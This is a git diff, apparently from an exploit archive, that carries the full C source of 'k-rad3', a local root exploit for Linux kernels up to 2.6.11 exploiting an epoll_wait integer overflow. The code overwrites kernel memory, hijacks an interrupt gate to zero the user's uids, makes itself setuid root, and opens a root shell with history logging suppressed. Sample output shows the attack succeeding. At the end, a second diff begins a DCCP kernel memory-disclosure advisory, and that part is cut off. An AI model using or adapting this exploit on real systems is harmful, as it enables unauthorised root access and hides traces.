__user_cap_data_struct n; - -int i; - -*clear1 = 0; -head.version = 0x19980330; -head.pid = 0; -capget(&head, &data); -/* scan the thread_struct */ -for (i = 0; i < 512; i++, ts++) -{ - /* is it capabilities block? 
*/ - if ( (ts[0] == data.effective) && - (ts[1] == data.inheritable) && - (ts[2] == data.permitted)) - { - /* set effective cap to some val */ - ts[0] = 0x12341234; - capget(&head, &n); - /* and test if it has changed */ - if (n.effective == ts[0]) - { - /* if so, we're in :) */ - ts[0] = ts[1] = ts[2] = 0xffffffff; - return; - } - /* otherwise fix back the stuff - (if we've not crashed already :) */ - ts[0] = data.effective; - } -} -return; -} - - -void stub(void); -void __stub(void) -{ - asm ( - "stub:;" - " pusha;" - ); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " and %esp, %eax;" - " pushl (%eax);" - " call raise_cap;" - " pop %eax;" - " popa;" - " iret;" - ); - -} - - -/* write to kernel from buf, num bytes */ -static int -kwrite(unsigned base, char *buf, int num) -{ -#define DIV 256 -#define RES 4 - -int efd, c, i, fd; -int pi[2]; -struct epoll_event ev; -int *stab; -unsigned long ptr; -int count; -unsigned magic = 0xffffffff / 12 + 1; - - printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num); - /* initialize epoll */ - efd = epoll_create(4096); - if (efd < 0) - return -1; - - ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP; - - /* 12 bytes per fd + one more to be safely in stack space */ - count = (num+11)/12+RES; - - /* desc array */ - stab = alloca((count+DIV-1)/DIV*sizeof(int)); - - for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) - { - - if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0) - return -1; - - send(pi[0], "a", 1, 0); - stab[i] = pi[1]; - } - - /* highest fd and first descriptor */ - fd = pi[1]; - /* we've to allocate this separately because we need to have - it's fd preserved - using this we'll be writing actual bytes */ - epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); - //printf("EPOLL_CTL_ADD count %u\n",count); - for (i = 0, c = 0; i < (count-1); i++) - { - int n; - n = dup2(stab[i/DIV], fd+2+(i % DIV)); - if (n < 0) - return -1; - epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); - close(n); - } - - /* in 'n' we've the 
latest fd we're using to write data */ - for (i = 0; i < ((num+7)/8); i++) - { - /* data being written from end */ - memcpy(&ev.data, buf + num - 8 - i * 8, 8); - epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev); - - /* the actual kernel magic */ - ptr = (base + num - (i*8)) - (count * 12); - struct epoll_event *events =(struct epoll_event *)ptr; - //printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic); - int iret =epoll_wait(efd, (void *) ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - - } - /* don't ask why (rotten rb-trees) :) */ - if (i) - { - //printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic); - iret = epoll_wait(efd, (void *)ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - - } - - } - } - - close(efd); - for (i = 3; i <= fd; i++) - close(i); - - return 0; - -} - -/* real-mode interrupt table fixup - point all interrupts to iret. 
-let's hope this will shut up apm */ -static void -fixint(char *buf) -{ -unsigned *tab = (void *) buf; -int i; - - for (i = 0; i < 256; i++) - tab[i] = 0x0000400; /* 0000:0400h */ - /* iret */ - buf[0x400] =0xcf; -} - -/* establish pte pointing to virtual addr 'addr' */ -static int -map_pte(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 8); - buf[(pagenr) * 1024] = MKPTE(addr); - buf[(pagenr) * 1024+1] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4); -} - -/* make pme user can rw */ -static int -map_pme(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 32); - buf[(pagenr) * 1024] = MKPMD(addr); - buf[(pagenr) * 1024+1] = 0; - buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000; - buf[(pagenr) * 1024+3] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4*3); -} - - -static void -error(int d) -{ - printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n"); - exit(1); -} - - char *bashargv[] = { KRADPS1, NULL }; - char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null", - "HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null", - "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; - -static int -exploit(unsigned kernelbase, int npages) -{ - struct idt *idt; - struct idtr idtr; - - - - signal(SIGSEGV, error); - signal(SIGBUS, error); - - - /* get idt descriptor addr */ - asm ("sidt %0" : "=m" (idtr)); - /* - * if OS in vmware , idtr.base is not right,please fix it - * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table - * c0461000 D idt_table - * //idtr.base = 0xc0461000; - */ - - printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase); - - if ( !definePAE ) - { - map_pte(kernelbase, npages, idtr.base - kernelbase); - // idt = pae?(void *)MAP_PAE:(void *)MAP; - idt = (struct idt *)MAP; - }else - { - /* TODO: pse disable case 
*/ - if ( !havepse) - printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n"); - - map_pme(kernelbase, npages, idtr.base - kernelbase); - idt = (struct idt *) idtr.base; - } - -#if 0 - int * p = (int *) idt; - int i; - for (i=0;i<1024;i++,p++) - printf( "* %p 0x%x\n",p,*p); - fflush(stdout); -#endif - - /** - * cleanup the stuff to prevent others spotting the gate - * - must be done from ring 0 - */ - clear1 = (void *) &idt[0x7f]; - printf("[+] idt[0x7f] addr %p\n",clear1); - - if ( exploitway == 0) - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode)); - } - else - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - } - - //[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - /** - * also can use [2] stub function,but it may cause this message - * - * Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531 - * Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1 - * Sep 11 13:11:59 AD4 kernel: [] __might_sleep+0x7d/0x89 - * Sep 11 13:11:59 AD4 kernel: [] sys_capget+0x1d5/0x216 - * Sep 11 13:11:59 AD4 kernel: [] syscall_call+0x7/0xb - * Sep 11 13:11:59 AD4 kernel: [] pipe_writev+0x24/0x320 - * Sep 11 13:11:59 AD4 kernel: [] filp_close+0x59/0x5f - * - */ - - /* call raise_cap or kernel */ - asm ("int $0x7f"); - printf(KRADP "j00 1u(k7 k1d!\n"); - setresuid(0, 0, 0); - setresgid(0, 0, 0); - char cmdbuf[1024]; - snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0); - system(cmdbuf); - - execve("/bin/sh", bashargv, bashenvp); - exit(0); -} - - - -static void -usage(char *n) -{ - - printf("\nUsage: %s\n",n); - printf("\t-s forced cpu flag pse \n"); - printf("\t-a define CONFIG_X86_PAE,default none\n"); - printf("\t-e have two kernel code,default 0\n"); - printf("\t-p alloc pages(4k) ,default 1. 
Increase from 1 to 7\n"
- "\t\tThe higher number the more likely it will crash\n");
- printf("\t-t default 0 \n"
- "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n");
- printf("\n");
- _exit(1);
-}
-
-
-/*read /proc/cpuinfo to set havepse*/
-static void
-read_proc(void)
-{
- FILE * fp;
- char * line = NULL;
- size_t len = 0;
- ssize_t read;
- printf("[+] try open /proc/cpuinfo ..");
- fp = fopen("/proc/cpuinfo", "r");
- if (fp == NULL)
- {
- printf(" failed!!\n");
- return;
- }
- printf(" ok!!\n");
-
- int cpus = 0;
- int pse = 0;
- while ((read = getline(&line, &len, fp)) != -1)
- {
-
- if (strstr(line,"flags"))
- {
- if(strstr(line ,"pse "))
- {
- pse ++;
- }
- }
-
- }
- fclose(fp);
-
- if (line)
- free(line);
-
- if ( pse )
- {
- printf("[+] find cpu flag pse in /proc/cpuinfo\n");
- havepse = 1;
- }
-
- return ;
-
-}
-
-static void
-get_config(int ac, char **av)
-{
-
- uid = getuid();
- progargv0 = av[0];
-
- int r;
-
- while(ac) {
- r = getopt(ac, av, "e:p:t:ash");
-
- if(r<0) break;
-
- switch(r) {
-
- case 's' :
- //pse
- havepse = 1;
- break;
-
- case 'a' :
- //define CONFIG_X86_PAE
- definePAE = 1;
- break;
-
- case 'e' :
- exploitway = atoi(optarg);
- if(exploitway<0) fatal("bad exploitway value");
- break;
-
- case 'p' :
- npages = atoi(optarg);
- break;
- case 't' :
- thread_size = atoi(optarg);
-
- break;
-
- case 'h' :
- default:
- usage(av[0]);
- break;
- }
- }
-
- THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192);
-
- read_proc();
-}
-
-static void
-print_config(unsigned long kernebase)
-{
- printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none");
- printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none");
- printf("[+] Exploit Way : %d\n", exploitway);
- printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n",
- npages,kernebase,kernebase+npages*4 kB);
- printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size);
- fflush(stdout);
-}
-
-
-void prepare(void)
-{
- if (geteuid() ==
0) - { - setresuid(0, 0, 0); - setresgid(0, 0, 0); - execve("/bin/sh", bashargv, bashenvp); - fatal("[-] Unable to spawn shell"); - } -} - -int -main(int argc, char **argv) -{ - char eater[65536]; - unsigned long kernelbase; - - /* unlink(argv[0]); */ - // sync(); - - printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n" - KRS "Discovered Jan 2005 by sd " KRE "\n" - KRS "Modified 2005/9 by alert7 " KRE "\n"); - - if ( (unsigned long)eater > 0xc0000000) - { - printf("[!Waring!] TODO:use stack > 0xc0000000 \n"); - return 0; - } - - prepare(); - - get_config(argc,argv); - - kernelbase =(unsigned long)eater ; - kernelbase +=0x0fffffff; - kernelbase &=0xf0000000; - - print_config(kernelbase); - - exploit(kernelbase, npages<0?-npages:npages); - - return 0; - -} - -// milw0rm.com [2005-12-30] +/* +* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 +* Discovered and original exploit coded Jan 2005 by sd +* +********************************************************************* +* +* Modified 2005/9 by alert7 +* XFOCUS Security Team http://www.xfocus.org +* +* gcc -o k-rad3 k-rad3.c -static -O2 +* +* tested succeed : +* on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp) +* 2.6.9-5.EL ./k-rad3 -p 2 +* 2.6.9-5.ELsmp ./k-rad3 -a -p 7 +* on default installed maglic linux 1.2 +* MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2 +* +* thank watercloud tested maglic linux 1.2 +* thank eist provide RHEL4 to test +* thank sd share his stuff. +* thank xfocus & xfocus's firends +* +* +* TODO: +* CASE 1: use stack > 0xc0000000 +* CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse +* +*[alert7@MagicLinux ~]$ ./k-rad3 -h +*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] +*[ Discovered Jan 2005 by sd ] +*[ Modified 2005/9 by alert7 ] +* +*Usage: ./k-rad3 +* -s forced cpu flag pse +* -a define CONFIG_X86_PAE,default none +* -e have two kernel code,default 0 +* -p alloc pages(4k) ,default 1. 
Increase from 1 to 7 +* The higher number the more likely it will crash +* -t default 0 +* 0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 +* +*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2 +*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] +*[ Discovered Jan 2005 by sd ] +*[ Modified 2005/9 by alert7 ] +*[+] try open /proc/cpuinfo .. ok!! +*[+] find cpu flag pse in /proc/cpuinfo +*[+] CONFIG_X86_PAE :none +*[+] Cpu flag: pse ok +*[+] Exploit Way : 0 +*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n) +*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 +*[+] idtr.base 0xc0461000 ,base 0xc0000000 +*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196 +*[+] idt[0x7f] addr 0xffc003f8 +*[+] j00 1u(k7 k1d! +*[root@k-rad3 ~] #id +*uid=0(root) gid=0(root) groups=500(alert7) +* +* +* Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit +* +* "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) +* memory due to integer overflow in sys_epoll_wait and misuse of +* __put_user in ep_send_events" +* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html +* +********************************************************************* +* +* +* In memory of pwned.c (uselib) +* +* - Redistributions of source code is not permitted. +* - Redistributions in the binary form is not permitted. +* - Redistributions of the above copyright notice, this list of conditions, +* and the following disclaimer is permitted. +* - By proceeding to a Redistribution and under any form of the Program +* the Distributor is granting ownership of his Resources without +* limitations to the copyright holder(s). +* +* +* Since we already owned everyone, theres no point keeping this private +* anymore. +* +* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html +* +* Thanks to our internet hero georgi guninski for being such incredible +* whitehat disclosing one of the most reliable kernel bugs. 
+* You saved the world, man, we owe you one! +* +* This version is somewhat broken, but skilled reader will get an idea. +* Well, at least let the scriptkids have fun for a while. +* +* Thanks to all who helped me developing/testing this, you know who you are, +* and especially to my gf for guidance while coding this. +* +*/ + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef __USE_GNU + #define __USE_GNU +#endif +#include +#include +#include +#include + +/** + * Relationship Variables + * + * 1: CONFIG_X86_PAE + * see /lib/modules/`uname -r`/build/.config + * 1.1: pse + * 2: THREAD_SIZE + * see include/asm/thread_info.h THREAD_SIZE define + */ + + +#define MAP (0xfffff000 - (1023*4096)) +#define MAP_PAE (0xfffff000 - (511*4096)) +#define MKPTE(addr) ((addr & (~4095)) | 0x27) +#define MKPMD(x) (0x1e3|0x004) + +//////////////////////////////////////////////// + +#define KRADPS1 "k-rad3" + +#define kB * 1024 +#define MB * 1024 kB +#define GB * 1024 MB + +#define KRS "\033[1;30m[ \033[1;37m" +#define KRE "\033[1;30m ]\033[0m" +#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m " +#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m " +#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m " + +#define SET_IDT_GATE(idt,ring,s,addr) \ + (idt).off1 = addr & 0xffff; \ + (idt).off2 = addr >> 16; \ + (idt).sel = s; \ + (idt).none = 0; \ + (idt).flags = 0x8E | (ring << 5); + +//config val +static int havepse = 0; +static int definePAE = 0; +static int exploitway = 0; +static int npages = 1; +static int thread_size = 0; + + +static uid_t uid = 0; +static unsigned long long *clear1; +static char * progargv0; + +struct idtr { + unsigned short limit; + unsigned int base; +} __attribute__ ((packed)); + +struct idt { + unsigned short off1; + unsigned short sel; + unsigned char none,flags; + unsigned short off2; +} __attribute__ ((packed)); + + + +#define __syscall_return(type, res) \ +do { \ + if 
((unsigned long)(res) >= (unsigned long)(-125)) { \ + errno = -(res); \ + res = -1; \ + } \ + return (type) (res); \ +} while (0) + + +#define _capget_macro(type,name,type1,arg1,type2,arg2) \ + type name(type1 arg1,type2 arg2) \ + { \ + long __res; \ + __asm__ volatile ( "int $0x80" \ + : "=a" (__res) \ + : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ + __syscall_return(type,__res); \ + } + +static inline _capget_macro(int,capget,void *,a,void *,b); + +static int THREAD_SIZE_MASK =(-4096); + + +static void +fatal(const char *message) +{ + system("uname -a"); + printf("[-] %s\n",message); + exit(1); +} + +void kernel(unsigned * task) +{ + unsigned * addr = task; + /* looking for uids */ + + *clear1 = 0; + + while (addr[0] != uid || addr[1] != uid || + addr[2] != uid || addr[3] != uid + ) + addr++; + + addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */ + addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */ + +} + +void kcode(void); +void __kcode(void) +{ + asm( + "kcode: \n" + "cld \n" + " pusha \n" + " pushl %es \n" + " pushl %ds \n" + " movl %ss,%edx \n" + " movl %edx,%es \n" + " movl %edx,%ds \n"); + __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); + asm( + " andl %esp,%eax \n" + " pushl (%eax) \n" + " call kernel \n" + " addl $4, %esp \n" + " popl %ds \n" + " popl %es \n" + " popa \n" + " cli \n" + " iret \n" + ); +} + + +void raise_cap(unsigned long *ts) +{ +/* must be on lower addresses because of kernel arg check :) */ +static struct __user_cap_header_struct head; +static struct __user_cap_data_struct data; +static struct __user_cap_data_struct n; + +int i; + +*clear1 = 0; +head.version = 0x19980330; +head.pid = 0; +capget(&head, &data); +/* scan the thread_struct */ +for (i = 0; i < 512; i++, ts++) +{ + /* is it capabilities block? 
*/ + if ( (ts[0] == data.effective) && + (ts[1] == data.inheritable) && + (ts[2] == data.permitted)) + { + /* set effective cap to some val */ + ts[0] = 0x12341234; + capget(&head, &n); + /* and test if it has changed */ + if (n.effective == ts[0]) + { + /* if so, we're in :) */ + ts[0] = ts[1] = ts[2] = 0xffffffff; + return; + } + /* otherwise fix back the stuff + (if we've not crashed already :) */ + ts[0] = data.effective; + } +} +return; +} + + +void stub(void); +void __stub(void) +{ + asm ( + "stub:;" + " pusha;" + ); + __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); + asm( + " and %esp, %eax;" + " pushl (%eax);" + " call raise_cap;" + " pop %eax;" + " popa;" + " iret;" + ); + +} + + +/* write to kernel from buf, num bytes */ +static int +kwrite(unsigned base, char *buf, int num) +{ +#define DIV 256 +#define RES 4 + +int efd, c, i, fd; +int pi[2]; +struct epoll_event ev; +int *stab; +unsigned long ptr; +int count; +unsigned magic = 0xffffffff / 12 + 1; + + printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num); + /* initialize epoll */ + efd = epoll_create(4096); + if (efd < 0) + return -1; + + ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP; + + /* 12 bytes per fd + one more to be safely in stack space */ + count = (num+11)/12+RES; + + /* desc array */ + stab = alloca((count+DIV-1)/DIV*sizeof(int)); + + for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) + { + + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0) + return -1; + + send(pi[0], "a", 1, 0); + stab[i] = pi[1]; + } + + /* highest fd and first descriptor */ + fd = pi[1]; + /* we've to allocate this separately because we need to have + it's fd preserved - using this we'll be writing actual bytes */ + epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); + //printf("EPOLL_CTL_ADD count %u\n",count); + for (i = 0, c = 0; i < (count-1); i++) + { + int n; + n = dup2(stab[i/DIV], fd+2+(i % DIV)); + if (n < 0) + return -1; + epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); + close(n); + } + + /* in 'n' we've the 
latest fd we're using to write data */
+ for (i = 0; i < ((num+7)/8); i++)
+ {
+ /* data being written from end */
+ memcpy(&ev.data, buf + num - 8 - i * 8, 8);
+ epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev);
+
+ /* the actual kernel magic */
+ ptr = (base + num - (i*8)) - (count * 12);
+ struct epoll_event *events =(struct epoll_event *)ptr;
+ //printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic);
+ int iret =epoll_wait(efd, (void *) ptr, magic, 31337);
+ if (iret ==-1)
+ {
+ perror("epoll_wait");
+ fatal("This kernel not vulnerability!!!");
+
+ }
+ /* don't ask why (rotten rb-trees) :) */
+ if (i)
+ {
+ //printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic);
+ iret = epoll_wait(efd, (void *)ptr, magic, 31337);
+ if (iret ==-1)
+ {
+ perror("epoll_wait");
+ fatal("This kernel not vulnerability!!!");
+
+ }
+
+ }
+ }
+
+ close(efd);
+ for (i = 3; i <= fd; i++)
+ close(i);
+
+ return 0;
+
+}
+
+/* real-mode interrupt table fixup - point all interrupts to iret.
+let's hope this will shut up apm */ +static void +fixint(char *buf) +{ +unsigned *tab = (void *) buf; +int i; + + for (i = 0; i < 256; i++) + tab[i] = 0x0000400; /* 0000:0400h */ + /* iret */ + buf[0x400] =0xcf; +} + +/* establish pte pointing to virtual addr 'addr' */ +static int +map_pte(unsigned base, int pagenr, unsigned addr) +{ + unsigned *buf = alloca(pagenr * 4096 + 8); + buf[(pagenr) * 1024] = MKPTE(addr); + buf[(pagenr) * 1024+1] = 0; + fixint((void *)buf); + return kwrite(base, (void *)buf, pagenr * 4096 + 4); +} + +/* make pme user can rw */ +static int +map_pme(unsigned base, int pagenr, unsigned addr) +{ + unsigned *buf = alloca(pagenr * 4096 + 32); + buf[(pagenr) * 1024] = MKPMD(addr); + buf[(pagenr) * 1024+1] = 0; + buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000; + buf[(pagenr) * 1024+3] = 0; + fixint((void *)buf); + return kwrite(base, (void *)buf, pagenr * 4096 + 4*3); +} + + +static void +error(int d) +{ + printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n"); + exit(1); +} + + char *bashargv[] = { KRADPS1, NULL }; + char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null", + "HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null", + "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; + +static int +exploit(unsigned kernelbase, int npages) +{ + struct idt *idt; + struct idtr idtr; + + + + signal(SIGSEGV, error); + signal(SIGBUS, error); + + + /* get idt descriptor addr */ + asm ("sidt %0" : "=m" (idtr)); + /* + * if OS in vmware , idtr.base is not right,please fix it + * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table + * c0461000 D idt_table + * //idtr.base = 0xc0461000; + */ + + printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase); + + if ( !definePAE ) + { + map_pte(kernelbase, npages, idtr.base - kernelbase); + // idt = pae?(void *)MAP_PAE:(void *)MAP; + idt = (struct idt *)MAP; + }else + { + /* TODO: pse disable case 
*/ + if ( !havepse) + printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n"); + + map_pme(kernelbase, npages, idtr.base - kernelbase); + idt = (struct idt *) idtr.base; + } + +#if 0 + int * p = (int *) idt; + int i; + for (i=0;i<1024;i++,p++) + printf( "* %p 0x%x\n",p,*p); + fflush(stdout); +#endif + + /** + * cleanup the stuff to prevent others spotting the gate + * - must be done from ring 0 + */ + clear1 = (void *) &idt[0x7f]; + printf("[+] idt[0x7f] addr %p\n",clear1); + + if ( exploitway == 0) + { + SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode)); + } + else + { + SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); + } + + //[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); + /** + * also can use [2] stub function,but it may cause this message + * + * Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531 + * Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1 + * Sep 11 13:11:59 AD4 kernel: [] __might_sleep+0x7d/0x89 + * Sep 11 13:11:59 AD4 kernel: [] sys_capget+0x1d5/0x216 + * Sep 11 13:11:59 AD4 kernel: [] syscall_call+0x7/0xb + * Sep 11 13:11:59 AD4 kernel: [] pipe_writev+0x24/0x320 + * Sep 11 13:11:59 AD4 kernel: [] filp_close+0x59/0x5f + * + */ + + /* call raise_cap or kernel */ + asm ("int $0x7f"); + printf(KRADP "j00 1u(k7 k1d!\n"); + setresuid(0, 0, 0); + setresgid(0, 0, 0); + char cmdbuf[1024]; + snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0); + system(cmdbuf); + + execve("/bin/sh", bashargv, bashenvp); + exit(0); +} + + + +static void +usage(char *n) +{ + + printf("\nUsage: %s\n",n); + printf("\t-s forced cpu flag pse \n"); + printf("\t-a define CONFIG_X86_PAE,default none\n"); + printf("\t-e have two kernel code,default 0\n"); + printf("\t-p alloc pages(4k) ,default 1. 
Increase from 1 to 7\n"
+ "\t\tThe higher number the more likely it will crash\n");
+ printf("\t-t default 0 \n"
+ "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n");
+ printf("\n");
+ _exit(1);
+}
+
+
+/*read /proc/cpuinfo to set havepse*/
+static void
+read_proc(void)
+{
+ FILE * fp;
+ char * line = NULL;
+ size_t len = 0;
+ ssize_t read;
+ printf("[+] try open /proc/cpuinfo ..");
+ fp = fopen("/proc/cpuinfo", "r");
+ if (fp == NULL)
+ {
+ printf(" failed!!\n");
+ return;
+ }
+ printf(" ok!!\n");
+
+ int cpus = 0;
+ int pse = 0;
+ while ((read = getline(&line, &len, fp)) != -1)
+ {
+
+ if (strstr(line,"flags"))
+ {
+ if(strstr(line ,"pse "))
+ {
+ pse ++;
+ }
+ }
+
+ }
+ fclose(fp);
+
+ if (line)
+ free(line);
+
+ if ( pse )
+ {
+ printf("[+] find cpu flag pse in /proc/cpuinfo\n");
+ havepse = 1;
+ }
+
+ return ;
+
+}
+
+static void
+get_config(int ac, char **av)
+{
+
+ uid = getuid();
+ progargv0 = av[0];
+
+ int r;
+
+ while(ac) {
+ r = getopt(ac, av, "e:p:t:ash");
+
+ if(r<0) break;
+
+ switch(r) {
+
+ case 's' :
+ //pse
+ havepse = 1;
+ break;
+
+ case 'a' :
+ //define CONFIG_X86_PAE
+ definePAE = 1;
+ break;
+
+ case 'e' :
+ exploitway = atoi(optarg);
+ if(exploitway<0) fatal("bad exploitway value");
+ break;
+
+ case 'p' :
+ npages = atoi(optarg);
+ break;
+ case 't' :
+ thread_size = atoi(optarg);
+
+ break;
+
+ case 'h' :
+ default:
+ usage(av[0]);
+ break;
+ }
+ }
+
+ THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192);
+
+ read_proc();
+}
+
+static void
+print_config(unsigned long kernebase)
+{
+ printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none");
+ printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none");
+ printf("[+] Exploit Way : %d\n", exploitway);
+ printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n",
+ npages,kernebase,kernebase+npages*4 kB);
+ printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size);
+ fflush(stdout);
+}
+
+
+void prepare(void)
+{
+ if (geteuid() ==
0)
+ {
+ setresuid(0, 0, 0);
+ setresgid(0, 0, 0);
+ execve("/bin/sh", bashargv, bashenvp);
+ fatal("[-] Unable to spawn shell");
+ }
+}
+
+int
+main(int argc, char **argv)
+{
+ char eater[65536];
+ unsigned long kernelbase;
+
+ /* unlink(argv[0]); */
+ // sync();
+
+ printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n"
+ KRS "Discovered Jan 2005 by sd " KRE "\n"
+ KRS "Modified 2005/9 by alert7 " KRE "\n");
+
+ if ( (unsigned long)eater > 0xc0000000)
+ {
+ printf("[!Waring!] TODO:use stack > 0xc0000000 \n");
+ return 0;
+ }
+
+ prepare();
+
+ get_config(argc,argv);
+
+ kernelbase =(unsigned long)eater ;
+ kernelbase +=0x0fffffff;
+ kernelbase &=0xf0000000;
+
+ print_config(kernelbase);
+
+ exploit(kernelbase, npages<0?-npages:npages);
+
+ return 0;
+
+}
+
+// milw0rm.com [2005-12-30]
diff --git a/platforms/linux/local/3587.c b/platforms/linux/local/3587.c
index c0fcafe3a..9c3032df1 100755
--- a/platforms/linux/local/3587.c
+++ b/platforms/linux/local/3587.c
@@ -1,114 +1,114 @@ -/* -Linux Kernel DCCP Memory Disclosure Vulnerability - -Synopsis: - - The Linux kernel is susceptible to a locally exploitable flaw - which may allow local users to steal data from the kernel memory. - -Vulnerable Systems: - - Linux Kernel Versions: >= 2.6.20 with DCCP support enabled. - Kernel versions <2.6.20 lack - DCCP_SOCKOPT_SEND_CSCOV/DCCP_SOCKOPT_RECV_CSCOV optnames for - getsockopt() call with SOL_DCCP level, which are used in the - delivered POC code. - -Author: - - Robert Swiecki - http://www.swiecki.net - robert@swiecki.net - -Details: - - The flaw exists in do_dccp_getsockopt() function in - net/dccp/proto.c file. - ------------------------ -static int do_dccp_getsockopt(struct sock *sk, int level, int optname, - char __user *optval, int __user *optlen) -... -if (get_user(len, optlen)) - return -EFAULT; -if (len < sizeof(int)) - return -EINVAL; -... ------------------------ - - The above code doesn't check `len' variable for negative values. - Because of cast typing (len < 